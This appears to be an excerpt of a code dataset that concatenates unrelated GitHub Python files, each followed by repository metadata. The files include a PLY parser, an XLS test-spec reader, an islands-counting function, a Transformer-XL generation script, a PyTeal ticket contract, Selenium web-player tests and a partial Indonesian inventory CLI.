        operador_negacao : NEGACAO
        '''
        p[0] = Node('operador_negacao', value = 'operador_negacao', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])

    def p_operador_multiplicacao(self, p):
        '''
        operador_multiplicacao : MULTIPLICACAO
                               | DIVISAO
        '''
        p[0] = Node('operador_multiplicacao', value = 'operador_multiplicacao', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])

    # ------------------------------------------------------------------
    # Primary expressions
    # ------------------------------------------------------------------
    def p_fator(self, p):
        '''
        fator : ABRE_PARENTESE expressao FECHA_PARENTESE
              | var
              | chamada_funcao
              | numero
        '''
        if(len(p) == 4):
            p[0] = Node('fator', value = 'fator', children = [
                Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
                p[2],
                Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3))
            ])
        else:
            p[0] = Node('fator', value = 'fator', children = [p[1]])

    def p_numero(self, p):
        '''
        numero : NUM_INTEIRO
               | NUM_PONTO_FLUTUANTE
               | NUM_NOTACAO_CIENTIFICA
        '''
        p[0] = Node('numero', value = 'numero', children = [
            Node(str(p[1]), value = p[1], line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])

    def p_chamada_funcao(self, p):
        '''
        chamada_funcao : ID ABRE_PARENTESE lista_argumentos FECHA_PARENTESE
        '''
        p[0] = Node('chamada_funcao', value = 'chamada_funcao', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3],
            Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
        ])

    def p_lista_argumentos(self, p):
        '''
        lista_argumentos : lista_argumentos VIRGULA expressao
                         | expressao
                         | vazio
        '''
        if(len(p) == 4):
            p[0] = Node('lista_argumentos', value = 'lista_argumentos', children = [
                p[1],
                Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
                p[3]
            ])
        else:
            # `vazio` reduces to None: an empty argument list yields a leaf node.
            if(p[1] is not None):
                p[0] = Node('lista_argumentos', value = 'lista_argumentos', children = [p[1]])
            else:
                p[0] = Node('lista_argumentos', value = 'lista_argumentos')

    def p_vazio(self, p):
        '''
        vazio :
        '''
        pass

    def p_error(self, p):
        """ply error hook: report the offending token and mark the parse failed."""
        self.result = False
        if p:
            print('Sintaxe Inválida do token \'' + str(p.value) + '\' em ' + str(p.lineno) + ':' + str(self.lexer.f_column(p)))
        else:
            print('Sintaxe Inválida da saída')

    def syntactic(self, codeFile, numberOfLines):
        """Parse *codeFile* (source text) and return (tree, success_flag)."""
        self.totalLines = numberOfLines
        self.tree = self.parser.parse(codeFile, tracking = True)
        return self.tree, self.result
{
"api_name": "lex.Lexer.tokens",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "lex.Lexer",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "lex.Lexer",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "ply.yacc.yacc",
"line_num... |
7282602903 | ################################################################################
# 1. Including files
################################################################################
import xlrd
################################################################################
# 2. Class definition
################################################################################
class testSuiteCollection:
    """A named unit-test suite and the test cases collected into it."""
    test_suite_name = ""  # class-level default kept for backward compatibility

    def __init__(self, test_suite_name):
        self.test_suite_name = str(test_suite_name)
        # Bug fix: must be a per-instance list — a class-level `testcases = []`
        # is a single list shared by every suite (mutable class-attribute pitfall).
        self.testcases = []
class testcaseCollection:
    """One test case: the function under test, its parameters and observed globals."""
    function_name = ""
    testcase_name = ""
    invoked_func_precondition = ""  # function invoked as a precondition, if any

    def __init__(self, function_name, testcase_name):
        self.function_name = str(function_name)
        self.testcase_name = str(testcase_name)
        # Bug fix: per-instance lists — class-level `params = []` / `global_vars = []`
        # would be shared across every test case (mutable class-attribute pitfall).
        self.params = []
        self.global_vars = []
class globalVarCollection:
    """Expected state of one global variable after a test case runs.

    All fields are stored as strings (values come straight from XLS cells).
    """
    gen_name = ""
    type = ""
    expected = ""
    actual_mem = ""
    mask = ""

    def __init__(self, gen_name, type, expected, actual_mem, mask):
        # Coerce every field to its string representation in one pass.
        for attr, raw in (("gen_name", gen_name), ("type", type),
                          ("expected", expected), ("actual_mem", actual_mem),
                          ("mask", mask)):
            setattr(self, attr, str(raw))
class paramCollection:
    """One input parameter of the function under test.

    All fields are stored as strings; `isStructType` is the literal "True"/"False"
    (string flags mirror what the spreadsheet pipeline expects).
    """
    gen_name = ""
    type = ""
    param_name = ""
    init_value = ""
    isStructType = "False"

    def __init__(self, gen_name, type, param_name, init_value, isStructType):
        # Coerce every field to its string representation in one pass.
        for attr, raw in (("gen_name", gen_name), ("type", type),
                          ("param_name", param_name), ("init_value", init_value),
                          ("isStructType", isStructType)):
            setattr(self, attr, str(raw))
################################################################################
# 3. Function definition
################################################################################
def find_output_position(firstParamColumn, worksheet=None):
    """Return the column index where the "Output" section starts on row 2.

    Generalized: *worksheet* may be passed explicitly; when omitted, the
    module-level ``sheet`` is used (backward compatible with existing calls).
    If no "Output" header is found, *firstParamColumn* is returned, meaning
    the sheet has no INPUT columns. The LAST matching column wins, as in the
    original scan.
    """
    ws = sheet if worksheet is None else worksheet
    output_position = firstParamColumn  # assume no INPUT data by default
    for col in range(ws.ncols):
        if ws.cell_value(2, col) == "Output":
            output_position = col
    return output_position
def isStructure(type):
    """Return "True" if the type name contains "Struct_", else "False".

    String flags (not booleans) are kept for compatibility with the XLS
    pipeline, and the parameter keeps its original (builtin-shadowing) name
    so keyword call sites stay valid.
    """
    # Idiom fix: substring membership instead of .index() + ValueError.
    return "True" if "Struct_" in type else "False"
################################################################################
# 4. Main processing: XLS file parsing
################################################################################
# Path to the unit-test specification workbook (absolute Windows path).
loc = ("C:\\Users\\PC\\Documents\\GitHub\\STM32F4Discovery\\UT_TestSuite.xls")
# Open Workbook
# Sheet indices that contain test-case tables, plus fixed layout constants:
# first parameter column, first test-case row, and the rows/columns that hold
# test-case names, invoked functions, and I/O type/name headers.
testcaseSheetList = [6, 8, 9, 10]
firstParamColumn = 3
tcFirstLine = 5
tcNameColumn = 0
tcInvokedFuncColumn = 1
ioTypeRow = 4
ioNameRow = 3
testSuite = testSuiteCollection("ut_usart_driver")
# Open XLS file
wb = xlrd.open_workbook(loc)
for tcSheet in testcaseSheetList:
    # Open a sheet
    sheet = wb.sheet_by_index(tcSheet)
    noRows = sheet.nrows
    noCols = sheet.ncols
    # Cell (0, 1) holds the name of the function under test for this sheet.
    func_name = sheet.cell_value(0, 1)
    output_position = find_output_position(firstParamColumn)
    for i in range(tcFirstLine, noRows):
        testcase_name = sheet.cell_value(i, tcNameColumn)
        testcase_invoked_func = sheet.cell_value(i, tcInvokedFuncColumn)
        # Each parameter / global variable occupies two columns (value + mask).
        noParams = (output_position - firstParamColumn) // 2 # division with result of integer number
        noGlobalVars = (noCols - output_position) // 2 # division with result of integer number
        testcase = testcaseCollection(func_name, testcase_name)
        testcase.invoked_func_precondition = testcase_invoked_func
        testcase.params = [None]*noParams
        testcase.global_vars = [None]*noGlobalVars
        # Collect all parameters
        index = 0
        for j in range(firstParamColumn, output_position, 2):
            gen_name = "param_" + str(index + 1)
            type = sheet.cell_value(ioTypeRow, j) # unchanged
            param_name = sheet.cell_value(ioNameRow, j) # unchanged
            init_value = sheet.cell_value(i, j)
            isStructType = isStructure(type)
            testcase.params[index] = \
                paramCollection(gen_name, type, param_name, init_value, isStructType)
            index += 1
        # Collect all global variables
        index = 0
        # NOTE(review): the stop bound `noCols - 1` skips the last column pair when
        # noCols is exact; noGlobalVars above uses noCols — confirm intended.
        for j in range(output_position, noCols - 1, 2):
            gen_name = "global_var_" + str(index + 1)
            type = sheet.cell_value(ioTypeRow, j) # unchanged
            expected = sheet.cell_value(i, j)
            actual_mem = sheet.cell_value(ioNameRow, j) # unchanged
            mask = sheet.cell_value(i, j + 1)
            testcase.global_vars[index] = \
                globalVarCollection(gen_name, type, expected, actual_mem, mask)
            index += 1
        testSuite.testcases.append(testcase)
| duattn1/STM32F4Discovery_Unit_Testing | Script/UnitTestScript/XlsProcessing.py | XlsProcessing.py | py | 4,938 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "xlrd.open_workbook",
"line_number": 92,
"usage_type": "call"
}
] |
6084331741 | import collections
def number_of_islands(grid):
    """Count connected groups of "1" cells in *grid* (4-directional adjacency).

    Cells are the strings "1" (land) and "0" (water); each connected land
    component is flooded once with BFS.
    """
    if not grid:
        return 0
    rows, cols = len(grid), len(grid[0])
    seen = set()
    islands = 0

    def flood(start_row, start_col):
        # Breadth-first flood fill marking every reachable land cell as seen.
        pending = collections.deque([(start_row, start_col)])
        seen.add((start_row, start_col))
        while pending:
            cur_row, cur_col = pending.popleft()
            for d_row, d_col in ((1, 0), (-1, 0), (0, 1), (0, -1)):
                nxt = (cur_row + d_row, cur_col + d_col)
                in_bounds = 0 <= nxt[0] < rows and 0 <= nxt[1] < cols
                if in_bounds and grid[nxt[0]][nxt[1]] == "1" and nxt not in seen:
                    seen.add(nxt)
                    pending.append(nxt)

    # Every unseen land cell starts exactly one new island.
    for r in range(rows):
        for c in range(cols):
            if grid[r][c] == "1" and (r, c) not in seen:
                flood(r, c)
                islands += 1
    return islands
| phuclinh9802/data_structures_algorithms | blind 75/number_of_islands.py | number_of_islands.py | py | 1,416 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 18,
"usage_type": "call"
}
] |
8670535309 | import logging
from cterasdk import CTERAException
def suspend_filer_sync(self=None, device_name=None, tenant_name=None):
    """Suspend sync on a device"""
    logging.info("Starting suspend sync task.")
    try:
        # Resolve the filer on the given tenant, then suspend its cloud sync
        # and wait for the operation to complete.
        filer = self.devices.device(device_name, tenant_name)
        filer.sync.suspend(wait=True)
        logging.info("Suspended sync on %s", filer.name)
    except Exception as error:
        # Best-effort task: log and swallow so callers keep running.
        logging.warning(error)
        logging.error("Error suspending sync")
| ctera/ctools | suspend_sync.py | suspend_sync.py | py | 477 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "logging.info",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "logging.warning",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "logging.error",
"line_nu... |
8625978148 | import os
import torch
def load_checkpoint(path):
    """Load a training checkpoint onto the current CUDA device.

    *path* may be either a checkpoint file or a directory containing
    ``checkpoint_best.pt``.
    """
    if os.path.isdir(path):
        path = os.path.join(path, 'checkpoint_best.pt')
    device = f'cuda:{torch.cuda.current_device()}'
    print(f'Loading checkpoint from {path}')
    return torch.load(path, map_location=device)
# Restore the trained weights from the local training directory.
ckpt = load_checkpoint("./LM-TFM/")
# # adaptive softmax / embedding
# NOTE(review): the first `cutoffs` assignment is immediately overwritten by
# the next line — presumably leftover; confirm before removing.
cutoffs, tie_projs = [], [False]
cutoffs = [19997, 39997, 199997]
tie_projs += [True] * len(cutoffs)
# Base hyperparameters mirrored from the training configuration.
model_config_base = {
    'dropout'       : 0.1,
    'dropatt'       : 0.0,
    'tie_weight'    : False,
    'div_val'       : 1,
    'pre_lnorm'     : True,
    'cutoffs'       : cutoffs,
    'clamp_len'     : 400,
}
from transformers import TransfoXLTokenizer, TransfoXLLMHeadModel, TransfoXLConfig
# Initializing a Transformer XL configuration
configuration = TransfoXLConfig.from_dict(model_config_base)
# To match with pre-trained model
configuration.d_embed, configuration.d_head = 512, 64
configuration.d_inner, configuration.d_model = 2048, 512
configuration.mem_len, configuration.n_head = 192, 8
configuration.n_layer, configuration.tgt_len = 16, 192
configuration.vocab_size = 32000
# Build the model directly from the restored state dict (no hub download).
model = TransfoXLLMHeadModel.from_pretrained(pretrained_model_name_or_path=None, state_dict=ckpt['model_state'], config=configuration)
from transformers import PreTrainedTokenizer
from utils.tokenization_sentencepiece import FullTokenizer
from collections import Counter, OrderedDict
from os.path import join, exists
class Vocab(TransfoXLTokenizer):
    # TransfoXLTokenizer specialized for a Mongolian SentencePiece vocabulary:
    # tokenization is delegated to FullTokenizer and the symbol table is read
    # from ./data/mn_cased.vocab.
    def __init__(
        self,
        special=None,
        min_freq=0,
        max_size=None,
        lower_case=False,
        delimiter=None,
        vocab_file='./data/mn_cased.vocab',
        never_split=None,
        unk_token="<unk>",
        eos_token="</s>",
        additional_special_tokens=["<formula>"],
        **kwargs
    ):
        super().__init__(
            unk_token=unk_token, eos_token=eos_token, additional_special_tokens=additional_special_tokens, **kwargs
        )
        self.vocab_file = vocab_file
        # Eagerly build the symbol tables when a vocab file is given.
        if vocab_file is not None:
            self.build_vocab()

    def tokenize(self, line, add_eos=False, add_double_eos=False):
        # NOTE(review): a FullTokenizer is constructed on every call — consider
        # caching it on self if tokenize() turns out to be hot.
        tokenizer = FullTokenizer(model_file=join('./data', 'mn_cased.model'),
                                  vocab_file=join('./data', 'mn_cased.vocab'), do_lower_case=False)
        line = line.strip()
        # convert to lower case
        if self.lower_case:
            line = line.lower()
        # empty delimiter '' will evaluate False
        if self.delimiter == '':
            symbols = line
        else:
            symbols = tokenizer.tokenize(line)
        if add_double_eos: # lm1b
            return ['<S>'] + symbols + ['<S>']
        elif add_eos:
            return symbols + ['<eos>']
        else:
            return symbols

    def _build_from_file(self, vocab_file):
        # Load one symbol per line (first whitespace-separated field) into the
        # idx2sym list / sym2idx map, then cache the <unk> index.
        self.idx2sym = []
        self.sym2idx = OrderedDict()
        with open(vocab_file, 'r') as f:
            for line in f:
                symb = line.strip().split()[0]
                self.add_symbol(symb)
        self.unk_idx = self.sym2idx['<unk>']

    def build_vocab(self):
        if self.vocab_file:
            print('building vocab from {}'.format(self.vocab_file))
            self._build_from_file(self.vocab_file)
            print('final vocab size {}'.format(len(self)))
        else:
            # NOTE(review): this branch reads self.special / self.counter /
            # self.min_freq / self.max_size, which this __init__ never sets —
            # it looks unreachable with the default vocab_file; confirm.
            print('building vocab with min_freq={}, max_size={}'.format(
                self.min_freq, self.max_size))
            self.idx2sym = []
            self.sym2idx = OrderedDict()
            for sym in self.special:
                self.add_special(sym)
            for sym, cnt in self.counter.most_common(self.max_size):
                if cnt < self.min_freq: break
                self.add_symbol(sym)
            print('final vocab size {} from {} unique tokens'.format(
                len(self), len(self.counter)))
# Move the model to the GPU, switch to inference mode, and use fp16 weights.
model.to('cuda')
model.eval()
model.half()
# Tokenizer backed by the Mongolian SentencePiece vocab defined above.
cool_tokenizer = Vocab()
# reference - https://github.com/huggingface/transformers/blob/2ba147ecffa28e5a4f96eebd09dcd642117dedae/examples/run_generation.py
def text_generation(prompt_text, temp, topk, topp, beams, penalty, do_sample):
    """Generate a continuation (up to 20 tokens total) of *prompt_text*.

    Sampling is controlled by temperature, top-k/top-p, beam count and a
    repetition penalty; returns the decoded, whitespace-normalized text.
    """
    prompt_ids = cool_tokenizer.encode(prompt_text, return_tensors="pt").to('cuda')
    sequences = model.generate(
        input_ids=prompt_ids,
        max_length=20,
        temperature=temp,
        top_k=topk,
        top_p=topp,
        num_beams=beams,
        repetition_penalty=penalty,
        do_sample=do_sample,
    )
    # Batch size == 1. to add more examples please use num_return_sequences > 1
    decoded = cool_tokenizer.decode(sequences[0].tolist(), skip_special_tokens=True, clean_up_tokenization_spaces=True)
    # Replace SentencePiece word markers before re-joining on single spaces.
    return ' '.join(word.replace("▁", " ") for word in decoded.split())
# Manual smoke test: sample a short continuation for a Mongolian prompt.
print(text_generation("УИХ ", temp=1.0, topk=5, topp=1, beams=1, penalty=1.0, do_sample=True))
{
"api_name": "os.path.isdir",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 6,
... |
34366485863 | from scripts.leet75.reverse_string import Solution
class Test:
    """Table-driven tests covering both reverseString implementations."""

    # (input, expected) pairs, including single-element and empty edge cases.
    test_cases = [
        [["h", "e", "l", "l", "o"], ["o","l","l","e","h"]],
        [["H","a","n","n","a","h"], ["h","a","n","n","a","H"]],
        [["h"], ["h"]],
        [[], []],
    ]

    def test_reverse_string(self):
        solver = Solution()
        for given, expected in self.test_cases:
            assert expected == solver.reverseString(given)

    def test_reverse_string_recursive(self):
        solver = Solution()
        for given, expected in self.test_cases:
            assert expected == solver.reverseStringRecursive(given)
if __name__ == '__main__':
    # Quick manual check: reverse a sample word and print the result.
    soln = Solution()
    inp1 = ["h", "e", "l", "l", "o"]
    print(soln.reverseString(inp1))
{
"api_name": "scripts.leet75.reverse_string.Solution",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "scripts.leet75.reverse_string.Solution",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "scripts.leet75.reverse_string.Solution",
"line_number": 27,
... |
11715375830 | from typing import Literal
import beaker as bk
from pyteal import (
Expr,
Global,
InnerTxnBuilder,
Int,
Seq,
Txn,
TxnField,
TxnType,
abi,
)
# Beaker application that mints and distributes event-ticket ASAs.
app = bk.Application("EventTicket")
@app.external
def create_asset(
    assetName: abi.String,
    assetUrl: abi.String,
    assetTotal: abi.Uint64,
    managerAddress: abi.Address,
    metadataHash: abi.StaticBytes[Literal[32]],
) -> Expr:
    # Mint the event-ticket ASA via an inner AssetConfig transaction. The
    # application account keeps clawback/reserve/freeze authority so it can
    # later hand out tickets in get_asset; decimals=0 makes tickets whole units.
    return Seq( # Seq is used to group a set of operations with only the last returning a value on the stack
        # Start to build the transaction builder
        InnerTxnBuilder.Begin(),
        # This method accepts a dictionary of TxnField to value so all fields may be set
        InnerTxnBuilder.SetFields(
            {
                TxnField.type_enum: TxnType.AssetConfig,
                TxnField.config_asset_name: assetName.get(),
                TxnField.config_asset_url: assetUrl.get(),
                TxnField.config_asset_manager: managerAddress.get(),
                TxnField.config_asset_clawback: Global.current_application_address(),
                TxnField.config_asset_reserve: Global.current_application_address(),
                TxnField.config_asset_freeze: Global.current_application_address(),
                TxnField.config_asset_total: assetTotal.get(),
                TxnField.config_asset_metadata_hash: metadataHash.get(),
                TxnField.config_asset_decimals: Int(0),
            }
        ),
        # Submit the transaction we just built
        InnerTxnBuilder.Submit(),
    )
@app.external
def get_asset(asset: abi.Asset) -> Expr:
return Seq( # Seq is used to group a set of operations with only the last returning a value on the stack
# Start to build the transaction builder
InnerTxnBuilder.Begin(),
# This method accepts a dictionary of TxnField to value so all fields may be set
InnerTxnBuilder.SetFields(
{
TxnField.type_enum: TxnType.AssetTransfer,
TxnField.xfer_asset: asset.asset_id(),
TxnField.asset_amount: Int(1),
TxnField.asset_receiver: Txn.sender(),
TxnField.asset_sender: Global.current_application_address(),
}
),
# Submit the transaction we just built
InnerTxnBuilder.Submit(),
)
if __name__ == "__main__":
spec = app.build()
spec.export("artifacts")
| freddyblockchain/AlgokitProject | smart_contracts/code/eventticket.py | eventticket.py | py | 2,429 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "beaker.Application",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "pyteal.abi.String",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "pyteal.abi",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "pyteal.abi.Strin... |
19933632487 | """
Your Library Page Testing
This script tests the Your Library Page functions and report the results to allure
This script requires `allure` and `pytest` be installed within the Python environment you are running this script in
"""
import time
import allure
import pytest
from Web_Testing.Pages.WebPlayerLibrary import WebPlayerLibrary
from Web_Testing.helperClasses import WebHelper
from Web_Testing.Pages.LoginPage import LoginPage
from Web_Testing.Pages.SignupPage import SignupPage
from Web_Testing.Pages.WebPlayerHome import WebPlayerHome
from Web_Testing.Pages.LoggedOutHome import LoggedOutHome
from selenium import webdriver
from Web_Testing.helperClasses import ConstantsClass
@allure.parent_suite("End to End testing")
@allure.suite("Your Library Page")
@allure.feature("Your Library Page")
@allure.severity(allure.severity_level.BLOCKER)
class TestWebPlayerLibrary:
driver = WebHelper().firefox_driver_init()
helper = WebHelper()
helper.set_driver(driver)
@pytest.yield_fixture
def setup_initial(self):
self.driver.get(WebHelper().get_login_url())
self.driver.maximize_window()
yield
self.driver.refresh()
@pytest.yield_fixture
def setup(self):
self.driver.get(self.helper.base_url + "webplayer/home")
self.driver.maximize_window()
yield
# self.driver.close()
@pytest.yield_fixture
def setup_final(self):
self.driver.get(self.helper.base_url + "webplayer/home")
self.driver.maximize_window()
yield
self.driver.close()
# Test #1 -> Your Library Button
@allure.severity(allure.severity_level.BLOCKER)
@allure.story("Testing Your Library Liked Songs Play Button")
@allure.title("Liked Songs Play Button")
@allure.description("Testing Your Library Liked Songs Play Button")
@pytest.mark.Do
@pytest.mark.YourLibrary
def test_case_1(self, setup_initial):
time.sleep(3)
lp = LoginPage(self.driver)
lp.login_to_spotify("test1@test.com", "test123")
time.sleep(3)
self.driver.get(self.helper.base_url + "webplayer/home")
time.sleep(3)
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_your_library()
time.sleep(2)
web_player_library = WebPlayerLibrary(self.driver)
if web_player_library.check_liked_songs_click():
self.helper.report_allure("SUCCESS: Your Library Liked songs cards are functional")
assert True
else:
self.helper.report_allure("FAILURE: Your Library Liked songs cards are not functional")
assert False
# Test #2 -> Playlists Cards
@allure.severity(allure.severity_level.BLOCKER)
@allure.story("Testing Your Library playlists cards")
@allure.title("Playlists cards")
@allure.description("Testing Your Library Playlists cards")
@pytest.mark.Do
@pytest.mark.YourLibrary
def test_case_2(self, setup):
time.sleep(2)
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_your_library()
time.sleep(2)
web_player_library = WebPlayerLibrary(self.driver)
if web_player_library.check_card_click(0, True):
self.helper.report_allure("SUCCESS: Your Library page playlist cards are functional")
assert True
else:
self.helper.report_allure("FAILURE: Your Library page playlist cards are not functional")
assert False
# Test #3 -> Liked Songs Text Button
@allure.severity(allure.severity_level.BLOCKER)
@allure.story("Clicking on the Liked Songs Text in the card in Your Library Page")
@allure.title("Clicking Liked Songs Card text")
@allure.description("Clicking on the Liked Songs Text in the card in Your Library Page")
@pytest.mark.Do
@pytest.mark.YourLibrary
def test_case_3(self, setup):
time.sleep(2)
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_your_library()
time.sleep(2)
web_player_library = WebPlayerLibrary(self.driver)
web_player_library.click_liked_songs_txt()
if self.helper.url_has("webplayer/likedplay"):
self.helper.report_allure("SUCCESS: The Liked Songs Card button in your Library page is functional")
assert True
else:
self.helper.report_allure("FAILURE: The Liked Songs Card button in your Library page is not functional")
assert False
# Test #4 -> Your Library Button with empty playlist
@allure.severity(allure.severity_level.BLOCKER)
@allure.story("Testing Your Library Liked Songs Play Button with empty playlist")
@allure.title("Liked Songs Play Button with empty playlist")
@allure.description("Testing Your Library Liked Songs Play Button with empty playlist")
@pytest.mark.Do
@pytest.mark.YourLibrary
def test_case_4(self, setup_final):
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_logout()
time.sleep(2)
web_player_home.click_login()
time.sleep(3)
lp = LoginPage(self.driver)
lp.login_to_spotify("abdallah@gmail.com", "1234567")
time.sleep(3)
self.driver.get(self.helper.base_url + "webplayer/home")
time.sleep(3)
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_your_library()
time.sleep(2)
web_player_library = WebPlayerLibrary(self.driver)
if web_player_library.check_liked_songs_click():
assert True
else:
assert False
| Project-X9/Testing | Web_Testing/Tests/test_yourLibrary.py | test_yourLibrary.py | py | 5,634 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Web_Testing.helperClasses.WebHelper",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "Web_Testing.helperClasses.WebHelper",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "Web_Testing.helperClasses.WebHelper",
"line_number": 34,
"usage_t... |
19509726145 | #README
'''
buka file dengan cara mengetikan:
python main.py "folder_yang_berisi_data_csv"
selama fungsi login belum jadi, cara keluar program adalah control + "c"
'''
#import modul yang dibuat
from read_csv import load
from add_data import *
from write_csv import save
from login import login
from caritahun import cari_tahun
from see_history import see_gadget_return_history,see_consumable_history,see_gadget_borrow_history
from interface import *
import argparse
import os,time
#inisialisasi Data (Loading Data dari CSV)
parser = argparse.ArgumentParser()
parser.add_argument("folder_location", help="Location of the folder that contains all the data.",nargs='?', const='')
args = parser.parse_args()
if args.folder_location is None:
print("Tidak ada folder yang dimasukkan")
exit()
current_path=os.getcwd()
new_path=os.path.join(current_path,args.folder_location)
if os.path.exists(new_path):
data=load(args.folder_location)
else:
print("Folder tidak ada")
exit()
loaded,user,gadget,consumable,consumable_history,gadget_borrow_history,gadget_return_history=data
#Algoritma Program
#User diminta untuk login
valid=False
while not valid:
valid,curret_id,curret_role=login(user)
while valid:
pilihan=input("Masukkan Pilihan Menu: ")
#Masukkan Fungsi-Fungsi Yang Sudah dibuat disini (F01-F17)
#F01 - Register
if pilihan=='register':
if curret_role=='admin':
add_data_user(user)
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F02 - Login
#Sudah di atas
#F03 - Pencarian Gadget Berdasarkan Rarity
if pilihan == "carirarity":
rarity=input("Masukkan rarity yang akan dicari: ")
if rarity=='S' or rarity=='A' or rarity=='B' or rarity=='C':
found=False
for j in range(len(gadget)):
if rarity==gadget[j][4]:
found=True
print("Nama Gadget : ",gadget[j][1])
print("Deskripsi : ",gadget[j][2])
print("Jumlah : ",gadget[j][3])
print("Rarity : ",gadget[j][4])
print("Tahun Ditemukan : ",gadget[j][5])
print("")
if not found:
print("Tidak ada gadget dengan rarity tersebut")
else:
print("Rarity tidak valid")
#F04 - Pencarian Gadget Berdasarkan Tahun
if pilihan=='caritahun':
cari_tahun(gadget)
#F05 - Menambah Item
if pilihan == "tambahitem":
if curret_role=='admin':
cek = 0 #untuk mengecek apakah id_item sudah ada
id_item = input("Masukkan ID: ")
if id_item[0] == 'G':
for i in range(1,len(gadget)):
if gadget[i][0] == id_item:
cek += 1
if cek > 0:
print("Gagal menambahkan item karena ID sudah ada.")
else: #cek == 0 atau id_item belum ada
add_data_gadget(id_item,gadget)
elif id_item[0] == 'C':
for i in range(1,len(consumable)):
if consumable[i][0] == id_item:
cek += 1
if cek > 0:
print("Gagal menambahkan item karena ID sudah ada.")
else: #cek == 0 atau id_item belum ada
add_data_consumable(id_item,consumable)
else:
print("Gagal menambahkan item karena ID tidak valid")
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F06 - Menghapus Item
if pilihan=='hapusitem':
if curret_role=='admin':
id_item_yang_akan_dihapus=input("Masukkan ID item yang akan dihapus : ")
if id_item_yang_akan_dihapus[0]=='G':
delete_gadget(id_item_yang_akan_dihapus,gadget)
elif id_item_yang_akan_dihapus[0]=='C':
delete_consumable(id_item_yang_akan_dihapus,consumable)
else:
print("ID tidak cocok")
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F07 - Mengubah jumlah pada inventory
if pilihan == "ubahjumlah":
if curret_role=='admin':
id_item_yang_akan_diubah = input("Masukan ID: ")
if id_item_yang_akan_diubah[0]=='G':
ubah_jumlah_gadget(id_item_yang_akan_diubah, gadget)
elif id_item_yang_akan_diubah[0]=='C':
ubah_jumlah_consumable(id_item_yang_akan_diubah, consumable)
else:
print("Tidak ada item dengan ID tersebut!")
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F08 - Meminjam Gadget
if pilihan=='pinjam':
if curret_role=='user':
add_data_gadget_borrow_history(curret_id,gadget,gadget_borrow_history)
else:
print("Fungsi Hanya diperbolehkan untuk User")
#F09 - Mengembalikan Gadget
if pilihan=='kembalikan':
if curret_role=='user':
add_data_gadget_return_history(curret_id,gadget,gadget_borrow_history,gadget_return_history)
else:
print("Fungsi Hanya diperbolehkan untuk User")
#F10 - Meminta Consumable
if pilihan=='minta':
if curret_role=='user':
add_data_consumable_history(curret_id,consumable,consumable_history)
else:
print("Fungsi Hanya diperbolehkan untuk user")
#F11 - Melihat Riwayat Peminjaman Gadget
if pilihan=='riwayatpinjam':
if curret_role=='admin':
see_gadget_borrow_history(user,gadget,gadget_borrow_history)
#F12 - Melihat Riwayat Pengembalian Gadget
if pilihan=='riwayatkembali':
if curret_role=='admin':
see_gadget_return_history(user,gadget,gadget_return_history)
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F13 - Melihat Riwayat Pengambilan Consumable
if pilihan=='riwayatambil':
if curret_role=='admin':
see_consumable_history(user,consumable,consumable_history)
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F14 - Load Data
#Sudah pada baigan awal bersama dengan argparse
#F15 - Save Data
if pilihan=='save':
os.system("cls")
path=input("Masukkan Folder tempat file akan di save: ")
save(path,user,gadget,consumable,consumable_history,gadget_borrow_history,gadget_return_history)
r=50
for i in range (r):
progressBar(i, r)
time.sleep(.02)
time.sleep(1.5)
data=load(path)
loaded,user,gadget,consumable,consumable_history,gadget_borrow_history,gadget_return_history=data
#F16 - Help
if pilihan == 'help':
print("================================= HELP =================================")
print("register - untuk melakukan registrasi user baru")
print("login - untuk melakukan login ke dalam sistem")
print("carirarity - untuk mencari gadget dengan rarity tertentu")
print("caritahun - untuk mencari gadget berdasarkan tahun ditemukan")
if curret_role=='admin':
print("tambahitem - untuk menambahkan item ke dalam inventori")
print("hapusitem - untuk menghapus suatu item pada database")
